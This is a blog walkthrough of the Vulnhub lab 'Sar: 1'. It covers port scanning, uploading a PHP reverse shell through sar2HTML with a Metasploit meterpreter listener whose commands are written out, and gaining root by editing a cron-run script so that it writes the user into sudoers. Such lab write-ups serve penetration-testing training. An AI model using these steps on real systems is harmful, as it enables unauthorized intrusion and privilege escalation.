Sar: 1 walkthrough Vulnhub CTF

Sar: 1 walkthrough Vulnhub CTF

Today we are solving another vulnhub CTF Sar: 1 this VM is created by Love. you can download here the Machine link

Description of Sar 1 CTF

Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.

Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box.  After running the lab, we used the netdiscover command to check the IP Address of the lab.

Now we will run an aggressive port scan using Nmap we see the Nmap scan target system port 80 http is open

We started from port 80 and tried to browse the webpage on our browser and we see an apache default page after scanning web site I found a robots.txt

opening the URL sar2HTML we already found the URL robots.txt file After enumeration the SarHTML I found a shell uploading field. Click the New button a new field is open click Browse button and navigate your shell and hit upload report.

Create a simple php reverse shell using Metasploit raw formate

Starting our Metasploit payload listener

  • use exploit/multi/handler
  • set payload php/meterpreter/reverse_tcp
  • set lhost
  • set lport 4545
  • run

we see our shell file uPLOAD directory now click the payload

our session is connected target machine I run the shell command and we see the blank shell import python modules spawn tty shell.

Enumerating the system directory and we found our first flag user.txt

Reading our First Flag love user home directory

we see the crontab script this script is run s root automatically every 5 minute

I move the /var/www/html directory and I found the bash script

cat command to see the script and we see another script inside the we see the file permission any user edit the file

I edit the file and add our current user sudoers file using the echo command the file is run automatically every file minute

After 5 minutes I run the sudo -l command and we see our current user entry sudoers file

Privilege Escalation

Finally, I found our last root flag root.txt

MuzzyBox 1 Vulnhub Walkthrough read

2 thoughts on “Sar: 1 walkthrough Vulnhub CTF”

  1. Nice weblog right here! Also your site so much up very fast!
    What host are you the usage of? Can I get your associate link for your host?

    I wish my site loaded up as fast as yours lol

Comments are closed.

Exit mobile version